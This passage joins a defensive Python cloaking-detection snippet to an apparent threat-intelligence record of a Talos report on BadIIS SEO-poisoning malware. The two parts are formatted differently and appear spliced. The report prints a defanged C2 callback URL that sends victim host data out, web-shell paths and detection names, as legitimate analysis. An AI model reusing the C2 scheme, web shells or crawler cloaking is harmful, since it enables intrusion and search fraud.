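def cloaking_check(fetch, url):
    # fetch(url, user_agent) -> (status, body bytes). A site that answers a crawler
    # User-Agent with a different page than a browser User-Agent is cloaking, which is
    # the visible symptom of the SEO fraud BadIIS performs.
    crawler_status, crawler_body = fetch(url, GOOGLEBOT_UA)
    browser_status, browser_body = fetch(url, BROWSER_UA)
    def digest(body):
        return hashlib.sha256(body).hexdigest()[:16]
    return {'cloaked': (crawler_status, crawler_body) != (browser_status, browser_body),
            'crawler': (crawler_status, digest(crawler_body)),
            'browser': (browser_status, digest(browser_body))}

def simulated_badiis_site(url, user_agent):
    # Constructed stand-in for a compromised server, not BadIIS code: crawlers get the
    # C2-supplied page, everyone else gets the real one.
    if is_crawler(user_agent):
        return 200, b'<html><title>[keywords supplied by the C2]</title></html>'
    return 200, b'<html><title>Acme Jewelry</title></html>'

if __name__ == '__main__':
    print(cloaking_check(simulated_badiis_site, 'http://www.example.com/'))
    print(parse_c2_request(c2_report_url('www.example.com', '/wp-content/uploads/2023/')))
```
Two caveats when running the check against a live site: compare after stripping nonces, timestamps and session-bound markup, or every dynamic page will look cloaked, and send the crawler request from an address the site cannot verify as a real Googlebot, since some cloaking only triggers on both the User-Agent and a reverse-DNS check.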
\r\nIf a request does not match the designated URL paths or includes a disallowed file extension, the proxy redirects the traffic to the C2 server with a different path, “/xx1.php”, sending the incoming request’s host name, URL path and domain name to the C2 server, as illustrated below. Additionally, the URI parameters used by the BadIIS malware are exactly the same as in the blog post’s source code, further evidence that the BadIIS we found was modified from that code.\r\nhttp://a.googie[.]pw/xx1.php?host=www.[REDACTED].com\u0026reurl=/wp-content/uploads/2023/\u0026domain=www.[REDACTED].com\r\nWe also identified that the BadIIS malware pretends to be the Google search engine crawler in its User-Agent header when it relays the connection to the C2 server. This could help the threat actor avoid alerts from network security products and bypass some weaker website security measures.\r\nThe BadIIS malware we confirmed affects neither the compromised server itself nor that server’s users. However, it poses a threat to users of third-party websites by acting as a conduit for phishing attacks. BadIIS leverages an Internet Server Application Programming Interface (ISAPI) DLL to take control of all HTTP requests sent to the hosted websites and to strategically modify the server’s HTTP responses. The malware carries out SEO deception on the infected IIS servers to boost the visibility of a third-party fraudulent website, specifically targeting and influencing the behavior of certain search engine crawlers, as detailed in the blog post. Below is the network request flow of the BadIIS operating mechanism in this campaign.\r\nAssembly web shell\r\nWe performed a pivot analysis of the C2 IP associated with PrintNotifyPotato using VirusTotal and other malware cloud repositories. Through this analysis, we discovered four distinct versions of ASP.NET-compiled DLLs that embed Metasploit and try to connect to the same C2 we found. These DLL files appear when ASP.NET compiles .aspx files into assemblies, which happens on first access to the .aspx file, with ASP.NET saving the resulting assemblies in a temporary directory.\r\nThe DLL web shells embed several functions: a Metasploit reverse shell, the Godzilla web shell and the ASPXSpy web shell. Below we list the web shell file paths and their corresponding functions.\r\nversion_1_metasploit_path = \"/Templates/Include/nc.aspx\"\r\nversion_2_metasploit_path = \"/730file/new.aspx\"\r\nversion_2_metasploit_path = \"/alx/new.aspx\"\r\nversion_3_metasploit_path = \"/upload/20231027/32.aspx\"\r\nversion_3_Godzilla_path = \"/upload/20231027/40222049595830.aspx\"\r\nversion_4_metasploit_path = \"/comm/32.aspx\"\r\nversion_4_404image_path = \"/comm/Image.aspx\"\r\nversion_4_ASPXSpy_path = \"/comm/list.aspx\"\r\nAlthough the ASPXSpy web shell is open source on GitHub, the specific version we identified in the compiled DLLs matches exactly the one used in this campaign.\r\nASPXSpy web shell in this campaign (left) and web shell in compiled DLLs (right).\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. 
\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The Snort SIDs for this threat are 63953 and 63954.\r\nClamAV detections are also available for this threat:\r\nWin.Trojan.Explosive-ASP-6510859-0\r\nAsp.Trojan.Webshell-6993264-0\r\nWin.Tool.GodPotato-10019688-1\r\nWin.Malware.Mimikatz-10034728-0\r\nWin.Tool.PrintNotifyPotato-10034729-0\r\nWin.Tool.UserClone-10034730-0\r\nWin.Malware.BadIIS-10034755-0\r\nWin.Trojan.PlugX_Payload-10034756-0\r\nWin.Trojan.PlugXLoader-10034757-0\r\nWin.Trojan.PlugXKernelDriver-10034758-0\r\nWin.Trojan.Mimikatz-6466236-2\r\nWin.Tool.BadPotato-9819486-2\r\nIndicators of compromise\r\nIndicators of compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/dragon-rank-seo-poisoning/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/dragon-rank-seo-poisoning/"
	],
	"report_names": [
		"dragon-rank-seo-poisoning"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0e62ad61-c51d-460e-a587-b11d17bb2fb3",
			"created_at": "2024-10-04T02:00:04.754794Z",
			"updated_at": "2026-04-10T02:00:03.712878Z",
			"deleted_at": null,
			"main_name": "DragonRank",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonRank",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434374,
	"ts_updated_at": 1775791685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.pdf",
		"text": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.txt",
		"img": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.jpg"
	}
}